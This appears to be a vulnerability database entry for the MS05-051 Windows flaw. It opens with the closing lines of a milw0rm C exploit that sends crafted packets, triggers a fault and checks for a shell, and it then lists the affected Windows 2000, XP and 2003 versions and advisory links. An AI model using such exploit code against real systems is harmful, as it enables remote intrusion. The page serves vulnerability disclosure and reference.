printf("(^_^) Function pointer wrote!\n");
//trigger
printf("(*_*) Trigger fault...");
Sleep(500);
s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
//WriteFakeLength(0x80811102-BaseImage[b]-4);
WriteFakeLength(0x226);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("Done!\n(*_*) Any shell?");
}
// milw0rm.com [2005-12-01]
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2003_server >> Version 64-bit
Microsoft>>Windows_2003_server >> Version itanium
Microsoft>>Windows_2003_server >> Version r2
Microsoft>>Windows_2003_server >> Version sp1
Microsoft>>Windows_2003_server >> Version sp1
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
References
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1134
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1283
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1513
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-051
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1550
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1338
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://www.idefense.com/application/poi/display?id=320&type=vulnerabilities
Tags : third-party-advisory, x_refsource_IDEFENSE
Tags : third-party-advisory, x_refsource_IDEFENSE
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A686
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
